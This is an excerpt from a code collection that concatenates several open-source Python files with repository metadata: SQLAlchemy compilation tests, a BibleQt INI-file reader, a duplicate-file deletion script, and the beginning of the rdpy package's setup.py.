self.assert_compile(s.select(),
'SELECT foo.* FROM (SELECT * FROM table1) '
'AS foo')
def test_table_to_alias_13(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
ff = vis.traverse(func.count(t1.c.col1).label('foo'))
self.assert_compile(select([ff]),
'SELECT count(t1alias.col1) AS foo FROM '
'table1 AS t1alias')
assert list(_from_objects(ff)) == [t1alias]
# def test_table_to_alias_2(self):
# TODO: self.assert_compile(vis.traverse(select([func.count(t1.c.col1)
# .label('foo')]), clone=True), "SELECT
# count(t1alias.col1) AS foo FROM table1 AS t1alias")
def test_table_to_alias_14(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
t2alias = t2.alias('t2alias')
vis.chain(sql_util.ClauseAdapter(t2alias))
self.assert_compile(vis.traverse(select(['*'], t1.c.col1
== t2.c.col2)),
'SELECT * FROM table1 AS t1alias, table2 '
'AS t2alias WHERE t1alias.col1 = '
't2alias.col2')
def test_table_to_alias_15(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
t2alias = t2.alias('t2alias')
vis.chain(sql_util.ClauseAdapter(t2alias))
self.assert_compile(
vis.traverse(
select(
['*'],
t1.c.col1 == t2.c.col2,
from_obj=[
t1,
t2])),
'SELECT * FROM table1 AS t1alias, table2 '
'AS t2alias WHERE t1alias.col1 = '
't2alias.col2')
def test_table_to_alias_16(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
t2alias = t2.alias('t2alias')
vis.chain(sql_util.ClauseAdapter(t2alias))
self.assert_compile(
select([t1alias, t2alias]).where(
t1alias.c.col1 ==
vis.traverse(select(['*'],
t1.c.col1 == t2.c.col2,
from_obj=[t1, t2]).correlate(t1))
),
"SELECT t1alias.col1, t1alias.col2, t1alias.col3, "
"t2alias.col1, t2alias.col2, t2alias.col3 "
"FROM table1 AS t1alias, table2 AS t2alias "
"WHERE t1alias.col1 = "
"(SELECT * FROM table2 AS t2alias "
"WHERE t1alias.col1 = t2alias.col2)"
)
def test_table_to_alias_17(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
t2alias = t2.alias('t2alias')
vis.chain(sql_util.ClauseAdapter(t2alias))
self.assert_compile(
t2alias.select().where(
t2alias.c.col2 == vis.traverse(
select(
['*'],
t1.c.col1 == t2.c.col2,
from_obj=[
t1,
t2]).correlate(t2))),
'SELECT t2alias.col1, t2alias.col2, t2alias.col3 '
'FROM table2 AS t2alias WHERE t2alias.col2 = '
'(SELECT * FROM table1 AS t1alias WHERE '
't1alias.col1 = t2alias.col2)')
def test_include_exclude(self):
m = MetaData()
a = Table('a', m,
Column('id', Integer, primary_key=True),
Column('xxx_id', Integer,
ForeignKey('a.id', name='adf', use_alter=True)
)
)
e = (a.c.id == a.c.xxx_id)
assert str(e) == "a.id = a.xxx_id"
b = a.alias()
e = sql_util.ClauseAdapter(b, include=set([a.c.id]),
equivalents={a.c.id: set([a.c.id])}
).traverse(e)
assert str(e) == "a_1.id = a.xxx_id"
def test_recursive_equivalents(self):
m = MetaData()
a = Table('a', m, Column('x', Integer), Column('y', Integer))
b = Table('b', m, Column('x', Integer), Column('y', Integer))
c = Table('c', m, Column('x', Integer), Column('y', Integer))
# force a recursion overflow, by linking a.c.x<->c.c.x, and
# asking for a nonexistent col. corresponding_column should prevent
# endless depth.
adapt = sql_util.ClauseAdapter(
b, equivalents={a.c.x: set([c.c.x]), c.c.x: set([a.c.x])})
assert adapt._corresponding_column(a.c.x, False) is None
def test_multilevel_equivalents(self):
m = MetaData()
a = Table('a', m, Column('x', Integer), Column('y', Integer))
b = Table('b', m, Column('x', Integer), Column('y', Integer))
c = Table('c', m, Column('x', Integer), Column('y', Integer))
alias = select([a]).select_from(a.join(b, a.c.x == b.c.x)).alias()
# two levels of indirection from c.x->b.x->a.x, requires recursive
# corresponding_column call
adapt = sql_util.ClauseAdapter(
alias, equivalents={b.c.x: set([a.c.x]), c.c.x: set([b.c.x])})
assert adapt._corresponding_column(a.c.x, False) is alias.c.x
assert adapt._corresponding_column(c.c.x, False) is alias.c.x
def test_join_to_alias(self):
metadata = MetaData()
a = Table('a', metadata,
Column('id', Integer, primary_key=True))
b = Table('b', metadata,
Column('id', Integer, primary_key=True),
Column('aid', Integer, ForeignKey('a.id')),
)
c = Table('c', metadata,
Column('id', Integer, primary_key=True),
Column('bid', Integer, ForeignKey('b.id')),
)
d = Table('d', metadata,
Column('id', Integer, primary_key=True),
Column('aid', Integer, ForeignKey('a.id')),
)
j1 = a.outerjoin(b)
j2 = select([j1], use_labels=True)
j3 = c.join(j2, j2.c.b_id == c.c.bid)
j4 = j3.outerjoin(d)
self.assert_compile(j4,
'c JOIN (SELECT a.id AS a_id, b.id AS '
'b_id, b.aid AS b_aid FROM a LEFT OUTER '
'JOIN b ON a.id = b.aid) ON b_id = c.bid '
'LEFT OUTER JOIN d ON a_id = d.aid')
j5 = j3.alias('foo')
j6 = sql_util.ClauseAdapter(j5).copy_and_process([j4])[0]
# this statement takes c join(a join b), wraps it inside an
# aliased "select * from c join(a join b) AS foo". the outermost
# right side "left outer join d" stays the same, except "d"
# joins against foo.a_id instead of plain "a_id"
self.assert_compile(j6,
'(SELECT c.id AS c_id, c.bid AS c_bid, '
'a_id AS a_id, b_id AS b_id, b_aid AS '
'b_aid FROM c JOIN (SELECT a.id AS a_id, '
'b.id AS b_id, b.aid AS b_aid FROM a LEFT '
'OUTER JOIN b ON a.id = b.aid) ON b_id = '
'c.bid) AS foo LEFT OUTER JOIN d ON '
'foo.a_id = d.aid')
def test_derived_from(self):
assert select([t1]).is_derived_from(t1)
assert not select([t2]).is_derived_from(t1)
assert not t1.is_derived_from(select([t1]))
assert t1.alias().is_derived_from(t1)
s1 = select([t1, t2]).alias('foo')
s2 = select([s1]).limit(5).offset(10).alias()
assert s2.is_derived_from(s1)
s2 = s2._clone()
assert s2.is_derived_from(s1)
def test_aliasedselect_to_aliasedselect_straight(self):
# original issue from ticket #904
s1 = select([t1]).alias('foo')
s2 = select([s1]).limit(5).offset(10).alias()
self.assert_compile(sql_util.ClauseAdapter(s2).traverse(s1),
'SELECT foo.col1, foo.col2, foo.col3 FROM '
'(SELECT table1.col1 AS col1, table1.col2 '
'AS col2, table1.col3 AS col3 FROM table1) '
'AS foo LIMIT :param_1 OFFSET :param_2',
{'param_1': 5, 'param_2': 10})
def test_aliasedselect_to_aliasedselect_join(self):
s1 = select([t1]).alias('foo')
s2 = select([s1]).limit(5).offset(10).alias()
j = s1.outerjoin(t2, s1.c.col1 == t2.c.col1)
self.assert_compile(sql_util.ClauseAdapter(s2).traverse(j).select(),
'SELECT anon_1.col1, anon_1.col2, '
'anon_1.col3, table2.col1, table2.col2, '
'table2.col3 FROM (SELECT foo.col1 AS '
'col1, foo.col2 AS col2, foo.col3 AS col3 '
'FROM (SELECT table1.col1 AS col1, '
'table1.col2 AS col2, table1.col3 AS col3 '
'FROM table1) AS foo LIMIT :param_1 OFFSET '
':param_2) AS anon_1 LEFT OUTER JOIN '
'table2 ON anon_1.col1 = table2.col1',
{'param_1': 5, 'param_2': 10})
def test_aliasedselect_to_aliasedselect_join_nested_table(self):
s1 = select([t1]).alias('foo')
s2 = select([s1]).limit(5).offset(10).alias()
talias = t1.alias('bar')
assert not s2.is_derived_from(talias)
j = s1.outerjoin(talias, s1.c.col1 == talias.c.col1)
self.assert_compile(sql_util.ClauseAdapter(s2).traverse(j).select(),
'SELECT anon_1.col1, anon_1.col2, '
'anon_1.col3, bar.col1, bar.col2, bar.col3 '
'FROM (SELECT foo.col1 AS col1, foo.col2 '
'AS col2, foo.col3 AS col3 FROM (SELECT '
'table1.col1 AS col1, table1.col2 AS col2, '
'table1.col3 AS col3 FROM table1) AS foo '
'LIMIT :param_1 OFFSET :param_2) AS anon_1 '
'LEFT OUTER JOIN table1 AS bar ON '
'anon_1.col1 = bar.col1', {'param_1': 5,
'param_2': 10})
def test_functions(self):
self.assert_compile(
sql_util.ClauseAdapter(t1.alias()).
traverse(func.count(t1.c.col1)),
'count(table1_1.col1)')
s = select([func.count(t1.c.col1)])
self.assert_compile(sql_util.ClauseAdapter(t1.alias()).traverse(s),
'SELECT count(table1_1.col1) AS count_1 '
'FROM table1 AS table1_1')
def test_recursive(self):
metadata = MetaData()
a = Table('a', metadata,
Column('id', Integer, primary_key=True))
b = Table('b', metadata,
Column('id', Integer, primary_key=True),
Column('aid', Integer, ForeignKey('a.id')),
)
c = Table('c', metadata,
Column('id', Integer, primary_key=True),
Column('bid', Integer, ForeignKey('b.id')),
)
d = Table('d', metadata,
Column('id', Integer, primary_key=True),
Column('aid', Integer, ForeignKey('a.id')),
)
u = union(
a.join(b).select().apply_labels(),
a.join(d).select().apply_labels()
).alias()
self.assert_compile(
sql_util.ClauseAdapter(u).
traverse(select([c.c.bid]).where(c.c.bid == u.c.b_aid)),
"SELECT c.bid "
"FROM c, (SELECT a.id AS a_id, b.id AS b_id, b.aid AS b_aid "
"FROM a JOIN b ON a.id = b.aid UNION SELECT a.id AS a_id, d.id "
"AS d_id, d.aid AS d_aid "
"FROM a JOIN d ON a.id = d.aid) AS anon_1 "
"WHERE c.bid = anon_1.b_aid"
)
class SpliceJoinsTest(fixtures.TestBase, AssertsCompiledSQL):
__dialect__ = 'default'
@classmethod
def setup_class(cls):
global table1, table2, table3, table4
def _table(name):
return table(name, column('col1'), column('col2'),
column('col3'))
table1, table2, table3, table4 = [
_table(name) for name in (
'table1', 'table2', 'table3', 'table4')]
def test_splice(self):
t1, t2, t3, t4 = table1, table2, table1.alias(), table2.alias()
j = t1.join(
t2,
t1.c.col1 == t2.c.col1).join(
t3,
t2.c.col1 == t3.c.col1).join(
t4,
t4.c.col1 == t1.c.col1)
s = select([t1]).where(t1.c.col2 < 5).alias()
self.assert_compile(sql_util.splice_joins(s, j),
'(SELECT table1.col1 AS col1, table1.col2 '
'AS col2, table1.col3 AS col3 FROM table1 '
'WHERE table1.col2 < :col2_1) AS anon_1 '
'JOIN table2 ON anon_1.col1 = table2.col1 '
'JOIN table1 AS table1_1 ON table2.col1 = '
'table1_1.col1 JOIN table2 AS table2_1 ON '
'table2_1.col1 = anon_1.col1')
def test_stop_on(self):
t1, t2, t3 = table1, table2, table3
j1 = t1.join(t2, t1.c.col1 == t2.c.col1)
j2 = j1.join(t3, t2.c.col1 == t3.c.col1)
s = select([t1]).select_from(j1).alias()
self.assert_compile(sql_util.splice_joins(s, j2),
'(SELECT table1.col1 AS col1, table1.col2 '
'AS col2, table1.col3 AS col3 FROM table1 '
'JOIN table2 ON table1.col1 = table2.col1) '
'AS anon_1 JOIN table2 ON anon_1.col1 = '
'table2.col1 JOIN table3 ON table2.col1 = '
'table3.col1')
self.assert_compile(sql_util.splice_joins(s, j2, j1),
'(SELECT table1.col1 AS col1, table1.col2 '
'AS col2, table1.col3 AS col3 FROM table1 '
'JOIN table2 ON table1.col1 = table2.col1) '
'AS anon_1 JOIN table3 ON table2.col1 = '
'table3.col1')
def test_splice_2(self):
t2a = table2.alias()
t3a = table3.alias()
j1 = table1.join(
t2a,
table1.c.col1 == t2a.c.col1).join(
t3a,
t2a.c.col2 == t3a.c.col2)
t2b = table4.alias()
j2 = table1.join(t2b, table1.c.col3 == t2b.c.col3)
self.assert_compile(sql_util.splice_joins(table1, j1),
'table1 JOIN table2 AS table2_1 ON '
'table1.col1 = table2_1.col1 JOIN table3 '
'AS table3_1 ON table2_1.col2 = '
'table3_1.col2')
self.assert_compile(sql_util.splice_joins(table1, j2),
'table1 JOIN table4 AS table4_1 ON '
'table1.col3 = table4_1.col3')
self.assert_compile(
sql_util.splice_joins(
sql_util.splice_joins(
table1,
j1),
j2),
'table1 JOIN table2 AS table2_1 ON '
'table1.col1 = table2_1.col1 JOIN table3 '
'AS table3_1 ON table2_1.col2 = '
'table3_1.col2 JOIN table4 AS table4_1 ON '
'table1.col3 = table4_1.col3')
class SelectTest(fixtures.TestBase, AssertsCompiledSQL):
"""tests the generative capability of Select"""
__dialect__ = 'default'
@classmethod
def setup_class(cls):
global t1, t2
t1 = table("table1",
column("col1"),
column("col2"),
column("col3"),
)
t2 = table("table2",
column("col1"),
column("col2"),
column("col3"),
)
def test_columns(self):
s = t1.select()
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
select_copy = s.column('yyy')
self.assert_compile(select_copy,
'SELECT table1.col1, table1.col2, '
'table1.col3, yyy FROM table1')
assert s.columns is not select_copy.columns
assert s._columns is not select_copy._columns
assert s._raw_columns is not select_copy._raw_columns
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
def test_froms(self):
s = t1.select()
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
select_copy = s.select_from(t2)
self.assert_compile(select_copy,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1, table2')
assert s._froms is not select_copy._froms
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
def test_prefixes(self):
s = t1.select()
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
select_copy = s.prefix_with('FOOBER')
self.assert_compile(select_copy,
'SELECT FOOBER table1.col1, table1.col2, '
'table1.col3 FROM table1')
self.assert_compile(s,
'SELECT table1.col1, table1.col2, '
'table1.col3 FROM table1')
def test_execution_options(self):
s = select().execution_options(foo='bar')
s2 = s.execution_options(bar='baz')
s3 = s.execution_options(foo='not bar')
# The original select should not be modified.
assert s._execution_options == dict(foo='bar')
# s2 should have its execution_options based on s, though.
assert s2._execution_options == dict(foo='bar', bar='baz')
assert s3._execution_options == dict(foo='not bar')
def test_invalid_options(self):
assert_raises(
exc.ArgumentError,
select().execution_options, compiled_cache={}
)
assert_raises(
exc.ArgumentError,
select().execution_options,
isolation_level='READ_COMMITTED'
)
# this feature not available yet
def _NOTYET_test_execution_options_in_kwargs(self):
s = select(execution_options=dict(foo='bar'))
s2 = s.execution_options(bar='baz')
# The original select should not be modified.
assert s._execution_options == dict(foo='bar')
# s2 should have its execution_options based on s, though.
assert s2._execution_options == dict(foo='bar', bar='baz')
# this feature not available yet
def _NOTYET_test_execution_options_in_text(self):
s = text('select 42', execution_options=dict(foo='bar'))
assert s._execution_options == dict(foo='bar')
class ValuesBaseTest(fixtures.TestBase, AssertsCompiledSQL):
"""Tests the generative capability of Insert, Update"""
__dialect__ = 'default'
# fixme: consolidate coverage from elsewhere here and expand
@classmethod
def setup_class(cls):
global t1, t2
t1 = table("table1",
column("col1"),
column("col2"),
column("col3"),
)
t2 = table("table2",
column("col1"),
column("col2"),
column("col3"),
)
def test_prefixes(self):
i = t1.insert()
self.assert_compile(i,
"INSERT INTO table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
gen = i.prefix_with("foober")
self.assert_compile(gen,
"INSERT foober INTO table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
self.assert_compile(i,
"INSERT INTO table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
i2 = t1.insert(prefixes=['squiznart'])
self.assert_compile(i2,
"INSERT squiznart INTO table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
gen2 = i2.prefix_with("quux")
self.assert_compile(gen2,
"INSERT squiznart quux INTO "
"table1 (col1, col2, col3) "
"VALUES (:col1, :col2, :col3)")
def test_add_kwarg(self):
i = t1.insert()
eq_(i.parameters, None)
i = i.values(col1=5)
eq_(i.parameters, {"col1": 5})
i = i.values(col2=7)
eq_(i.parameters, {"col1": 5, "col2": 7})
def test_via_tuple_single(self):
i = t1.insert()
eq_(i.parameters, None)
i = i.values((5, 6, 7))
eq_(i.parameters, {"col1": 5, "col2": 6, "col3": 7})
def test_kw_and_dict_simultaneously_single(self):
i = t1.insert()
i = i.values({"col1": 5}, col2=7)
eq_(i.parameters, {"col1": 5, "col2": 7})
def test_via_tuple_multi(self):
i = t1.insert()
eq_(i.parameters, None)
i = i.values([(5, 6, 7), (8, 9, 10)])
eq_(i.parameters, [
{"col1": 5, "col2": 6, "col3": 7},
{"col1": 8, "col2": 9, "col3": 10},
]
)
def test_inline_values_single(self):
i = t1.insert(values={"col1": 5})
eq_(i.parameters, {"col1": 5})
is_(i._has_multi_parameters, False)
def test_inline_values_multi(self):
i = t1.insert(values=[{"col1": 5}, {"col1": 6}])
eq_(i.parameters, [{"col1": 5}, {"col1": 6}])
is_(i._has_multi_parameters, True)
def test_add_dictionary(self):
i = t1.insert()
eq_(i.parameters, None)
i = i.values({"col1": 5})
eq_(i.parameters, {"col1": 5})
is_(i._has_multi_parameters, False)
i = i.values({"col1": 6})
# note replaces
eq_(i.parameters, {"col1": 6})
is_(i._has_multi_parameters, False)
i = i.values({"col2": 7})
eq_(i.parameters, {"col1": 6, "col2": 7})
is_(i._has_multi_parameters, False)
def test_add_kwarg_disallowed_multi(self):
i = t1.insert()
i = i.values([{"col1": 5}, {"col1": 7}])
assert_raises_message(
exc.InvalidRequestError,
"This construct already has multiple parameter sets.",
i.values, col2=7
)
def test_cant_mix_single_multi_formats_dict_to_list(self):
i = t1.insert().values(col1=5)
assert_raises_message(
exc.ArgumentError,
"Can't mix single-values and multiple values "
"formats in one statement",
i.values, [{"col1": 6}]
)
def test_cant_mix_single_multi_formats_list_to_dict(self):
i = t1.insert().values([{"col1": 6}])
assert_raises_message(
exc.ArgumentError,
"Can't mix single-values and multiple values "
"formats in one statement",
i.values, {"col1": 5}
)
def test_erroneous_multi_args_dicts(self):
i = t1.insert()
assert_raises_message(
exc.ArgumentError,
"Only a single dictionary/tuple or list of "
"dictionaries/tuples is accepted positionally.",
i.values, {"col1": 5}, {"col1": 7}
)
def test_erroneous_multi_args_tuples(self):
i = t1.insert()
assert_raises_message(
exc.ArgumentError,
"Only a single dictionary/tuple or list of "
"dictionaries/tuples is accepted positionally.",
i.values, (5, 6, 7), (8, 9, 10)
)
def test_erroneous_multi_args_plus_kw(self):
i = t1.insert()
assert_raises_message(
exc.ArgumentError,
"Can't pass kwargs and multiple parameter sets simultaenously",
i.values, [{"col1": 5}], col2=7
)
def test_update_no_support_multi_values(self):
u = t1.update()
assert_raises_message(
exc.InvalidRequestError,
"This construct does not support multiple parameter sets.",
u.values, [{"col1": 5}, {"col1": 7}]
)
def test_update_no_support_multi_constructor(self):
assert_raises_message(
exc.InvalidRequestError,
"This construct does not support multiple parameter sets.",
t1.update, values=[{"col1": 5}, {"col1": 7}]
)
| bsd-3-clause | -9,185,482,400,953,730,000 | 36.069753 | 79 | 0.493731 | false |
QProjectOrg/QRepo | src/convertors/base/bqt/initreader.py | 1 | 14171 | # -*- encoding: utf-8 -*-
import datetime
import os
import string
from src.convertors.base.bqt.currentbooksettings import CurrentBookSettings
from src.utils import commonscript
from src.utils.logger import log
from src.convertors.base.bqt.bqtdata import *
from src.utils.common import getFileNameInProperCase
class IniReader():
class CCurrentBookSettings(CurrentBookSettings):
pass
def __init__(self, ini_path):
self.input_filename = ini_path
self.ini_file = file(self.input_filename, 'r')
self.__set_default_values()
def __set_default_values(self):
self.Books = []
self.CurrentBookSettings = self.CCurrentBookSettings()
self.IniDesiredFontName = ""
self.init_values()
def init_data(self, dict_data):
self.ini_type = dict_data.get("IniType")
self.module_type = dict_data.get("ModuleType")
# self.INIEncoding = dict_data.get("INIEncoding")
self.ini_encoding = commonscript.getEncoding(self.input_filename)
self.module_directory = dict_data.get("ModuleDirectory")
def init_values(self):
self.introduction_exist = False
self.strongs_exist = False
self.ini_chapter_zero = 'N'
self.ini_apocrypha = 'N'
self.ini_strong_numbers = 'N'
self.ini_old_testament = ""
self.ini_new_testament = ""
self.ini_copyright = ""
self.ini_categories = ""
self.ini_greek = ""
self.ini_bible = "Y"
self.ini_desired_fontcharset = ""
self.ini_htmlfilter = ""
self.ini_alphabet = ""
self.ini_strongs_dDirectory = ""
self.ini_default_encoding = "utf-8"
self.ini_language = ""
self.ini_desired_fontpath = ""
self.ini_bookqt = 0
self.ini_bookchaptersign = ""
self.ini_bookversesign = ""
self.ini_developer = ""
self.ini_devcontact = ""
self.ini_date = datetime.date.today()
self.ini_version = "1.0"
self.ini_description = ""
self.ini_dict = {}
# parse bibleqt.ini
def parse_ini(self):
general_settings_parsed = False
self.init_values()
for line in self.ini_file:
# re-encode the line to UTF-8
line = line.decode(self.ini_encoding).encode('utf_8').strip()
# Line = Line.decode('utf_8').strip()
# handle the module's general settings
if not general_settings_parsed:
general_settings_parsed = self.__parse_general_settings(line)
else:
# handle the settings of an individual book in the module
self.__parse_book_settings(line)
def __generate_ini_dict(self):
ini_dict = {}
ini_dict['DesiredFontName'] = self.IniDesiredFontName
ini_dict['BibleName'] = self.HeadBibleName
ini_dict['BibleShortName'] = self.HeadBibleShortName
ini_dict['ChapterZero'] = self.ini_chapter_zero
ini_dict['Apocrypha'] = self.ini_apocrypha
ini_dict['StrongNumbers'] = self.ini_strong_numbers
ini_dict['OldTestament'] = self.ini_old_testament
ini_dict['NewTestament'] = self.ini_new_testament
ini_dict['Copyright'] = self.ini_copyright
ini_dict['Categories'] = self.ini_categories
ini_dict['Greek'] = self.ini_greek
ini_dict['Bible'] = self.ini_bible
ini_dict['DesiredFontCharset'] = self.ini_desired_fontcharset
ini_dict['HTMLFilter'] = self.ini_htmlfilter
ini_dict['Alphabet'] = self.ini_alphabet
ini_dict['StrongsDirectory'] = self.ini_strongs_dDirectory
ini_dict['DefaultEncoding'] = self.ini_default_encoding
ini_dict['Language'] = self.ini_language
ini_dict['DesiredFontPath'] = self.ini_desired_fontpath
ini_dict['BookQt'] = self.ini_bookqt
ini_dict['ChapterSign'] = self.ini_bookchaptersign
ini_dict['VerseSign'] = self.ini_bookversesign
ini_dict['Type'] = self.ini_type
ini_dict['Developer'] = self.ini_developer
ini_dict['DevContact'] = self.ini_devcontact
ini_dict['Date'] = self.ini_date
ini_dict['Version'] = self.ini_version
ini_dict['Description'] = self.ini_description
ini_dict['Books'] = self.Books
return ini_dict
# self.IniDict[''] = self.Ini
def __parse_general_settings(self, line):
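# Returns True once the 'BookQty' key has been read; parse_ini() then
# switches over to __parse_book_settings() for the remaining lines.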
# module name and short name
if line.startswith('BibleName'):
self.HeadBibleName = commonscript.getValue(line)
return False
# read the 'Bible' flag
if line.startswith('Bible '):
self.ini_bible = commonscript.getValue(line)
return False
if line.startswith('BibleShortName'):
self.HeadBibleShortName = commonscript.getValue(line)
self.__check_module_name(self.HeadBibleShortName)
if self.module_type == 'Apocrypha':
self.HeadBibleShortName += '-Apocrypha'
return False
# does chapter numbering in this module start from zero
if line.startswith('ChapterZero'):
self.ini_chapter_zero = commonscript.getValue(line)
if self.ini_chapter_zero == 'Y':
self.introduction_exist = True
self.OsisWriter.RemakeVersificationProblems()
return False
# read the chapter start marker used in the HTML file
if line.startswith('ChapterSign'):
self.ini_bookchaptersign = commonscript.getValue(line, "ChapterSign")
return False
# read the copyright
if line.startswith('Copyright'):
self.ini_copyright = commonscript.getValue(line)
return False
if line.startswith('Alphabet'):
self.ini_alphabet = commonscript.getValue(line)
return False
if line.startswith('HTMLFilter'):
self.ini_htmlfilter = commonscript.getValue(line, "HTMLFilter")
return False
if line.startswith('DesiredFontCharset'):
self.ini_desired_fontcharset = commonscript.getValue(line)
return False
# read the Greek flag
if line.startswith('Greek'):
self.ini_greek = commonscript.getValue(line)
return False
# read the categories
if line.startswith('Categories'):
self.ini_categories = commonscript.getValue(line)
return False
if line.startswith('StrongsDirectory'):
self.ini_strongs_dDirectory = commonscript.getValue(line)
return False
# read the verse start marker
if line.startswith('VerseSign'):
self.ini_bookversesign = commonscript.getValue(line, "VerseSign")
return False
if line.startswith('DesiredFontName'):
self.IniDesiredFontName = commonscript.getValue(line)
return False
if line.startswith('OldTestament'):
self.ini_old_testament = commonscript.getValue(line)
return False
if line.startswith('NewTestament'):
self.ini_new_testament = commonscript.getValue(line)
return False
# warn that the program does not process apocrypha
if line.startswith('Apocrypha'):
self.ini_apocrypha = commonscript.getValue(line)
if self.ini_apocrypha == 'Y' and \
not self.module_type == 'Apocrypha':
log("""
The script does not process apocrypha because the Sword library
currently does not support apocrypha in Bible modules. If you still
need the apocrypha, run the script with the "--moduletype Apocrypha"
parameter to get a module that contains only the apocrypha in the
format of a regular book.
""")
return False
# detect whether the module contains Strong's numbers
if line.startswith('StrongNumbers'):
self.ini_strong_numbers = commonscript.getValue(line)
if self.ini_strong_numbers == 'Y' and self.module_type not in JustBooks:
self.strongs_exist = True
return False
# read the number of books
if line.startswith('BookQty'):
self.ini_bookqt = commonscript.getValue(line)
self.IniBookCount = 0
return True
# custom options
if line.startswith('Description'):
self.ini_description = commonscript.getValue(line)
return False
if line.startswith('Developer'):
self.ini_developer = commonscript.getValue(line)
return False
if line.startswith('Date'):
self.ini_date = commonscript.getValue(line)
return False
if line.startswith('Version'):
self.ini_version = commonscript.getValue(line)
return False
if line.startswith('Type'):
self.ini_type = commonscript.getValue(line)
return False
def __parse_book_settings(self, line):
# read the file name, relative to the current directory
if line.startswith('PathName'):
self.CurrentBookSettings.PathName = "book_" + str(self.IniBookCount + 1) + \
'.html'
self.CurrentBookSettings.BookPathToFile = self.module_directory + commonscript.getValue(line)
return
# look up the mapping between the long and short book names
if line.startswith('ShortName') and self.module_type != 'Book':
self.CurrentBookSettings.ShortName = commonscript.getValue(line)
if not self.CurrentBookSettings.ShortName:
self.CurrentBookSettings.ShortName = "Empty ShortName"
if not self.CurrentBookSettings.FullName:
self.CurrentBookSettings.FullName = "Empty FullName"
return
# TODO: rewrite this block properly
for Pair in TableBooks:
if Pair[0] in line:
# self.CurrentBookSettings.FullName = Pair[1]
# self.CurrentBookSettings.Testament = Pair[2]
if Pair[2] == 3 and \
not self.module_type == 'Apocrypha':
log('WARNING: ', self.CurrentBookSettings.FullName, ' is an apocryphal book.')
# self.CurrentBookSettings.FullName = ''
elif Pair[2] != 3 and self.module_type == 'Apocrypha':
log('WARNING: ' + \
self.CurrentBookSettings.FullName + \
' is a canonical book.')
# self.CurrentBookSettings.FullName = ''
break
if Pair == TableBooks[len(TableBooks) - 1]:
# self.CurrentBookSettings.FullName = Pair[1]
# self.CurrentBookSettings.FullName = commonscript.getValue(Line)
log('Error: book name "' + self.CurrentBookSettings.FullName + '" was not found')
# store the book name
if line.startswith('FullName') and (self.module_type != 'Dictionary'):
self.CurrentBookSettings.FullName = commonscript.getValue(line)
return False
# move on to reading the book file
if line.startswith('ChapterQty') and self.CurrentBookSettings.FullName != '':
if os.path.exists(getFileNameInProperCase(self.CurrentBookSettings.BookPathToFile)):
self.CurrentBookSettings.BookPathToFile = getFileNameInProperCase(
self.CurrentBookSettings.BookPathToFile)
BookFile = file(getFileNameInProperCase(self.CurrentBookSettings.BookPathToFile), 'r')
self.CurrentBookSettings.ChapterQty = commonscript.getValue(line)
# write the book to the ini file
log('Processing file ' + self.CurrentBookSettings.BookPathToFile)
self.CurrentBookSettings.Encoding = commonscript.getEncoding(self.CurrentBookSettings.BookPathToFile)
self.CurrentBookSettings.ChapterSign = self.ini_bookchaptersign
self.Books.append(self.CurrentBookSettings)
self.CurrentBookSettings = self.CCurrentBookSettings()
self.IniBookCount += 1
BookFile.close()
else:
print "File not found: " + getFileNameInProperCase(self.CurrentBookSettings.BookPathToFile)
def __check_module_name(self, name):
for i in xrange(0, len(name)):
if not name[i] in string.printable:
log('WARNING: the module name contains non-Latin\n'
'characters. The resulting Sword module will not work\n'
'in some frontends, for example BibleTime.\n')
return
def get_ini_info(self):
return self.__generate_ini_dict() | mit | -3,103,329,302,460,644,400 | 39.603715 | 117 | 0.600885 | false |
mattmakesmaps/opencv-junk | opencv-utils/bin/delete_dupes.py | 1 | 1635 | import argparse
import os
import sys
def get_abs_path(in_path):
"""
Given a relative or absolute path, return the absolute path.
:param in_path: relative or absolute filesystem path.
:return: the absolute form of ``in_path``.
"""
if os.path.isabs(in_path):
return in_path
else:
return os.path.abspath(in_path)
if __name__ == '__main__':
# Define command line interface
parser = argparse.ArgumentParser(description='Given a source and target directory, '
'if files are present in the source, delete from the target.')
parser.add_argument('source_path', help="Path containing source files.", action="store")
parser.add_argument('target_path', help="Path containing files to delete if they appear in source.", action="store")
parser.add_argument('--dry-run', help="Don't delete, just output files marked for delete.",
action="store_true", default=False)
args = parser.parse_args()
full_source_path = get_abs_path(args.source_path)
full_target_path = get_abs_path(args.target_path)
source_files = os.listdir(full_source_path)
target_files = os.listdir(full_target_path)
if args.dry_run:
sys.stdout.write("DRY RUN: NO FILES WILL BE DELETED\n")
else:
sys.stdout.write("WARNING: THE FOLLOWING FILES WILL BE DELETED\n")
for source_file in source_files:
if source_file in target_files:
target_file = os.path.join(full_target_path, source_file)
sys.stdout.write("%s\n" % target_file)
# Real Run, Delete Files
if not args.dry_run:
os.remove(target_file)
| mit | -7,510,965,942,031,719,000 | 37.023256 | 120 | 0.625076 | false |
ChrisTruncer/rdpy | setup.py | 1 | 1335 | #!/usr/bin/env python
import setuptools
from distutils.core import setup, Extension
setup(name='rdpy',
version='1.3.2',
description='Remote Desktop Protocol in Python',
long_description="""
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (Client and Server side). RDPY is built over the event driven network engine Twisted.
RDPY provides RDP and VNC binaries: an RDP man-in-the-middle proxy that records sessions, an RDP honeypot, an RDP screenshotter, an RDP client, a VNC client, a VNC screenshotter and an RSS player
""",
author='Sylvain Peyrefitte',
author_email='[email protected]',
url='https://github.com/citronneur/rdpy',
packages=[
'rdpy',
'rdpy.core',
'rdpy.security',
'rdpy.protocol',
'rdpy.protocol.rdp',
'rdpy.protocol.rdp.pdu',
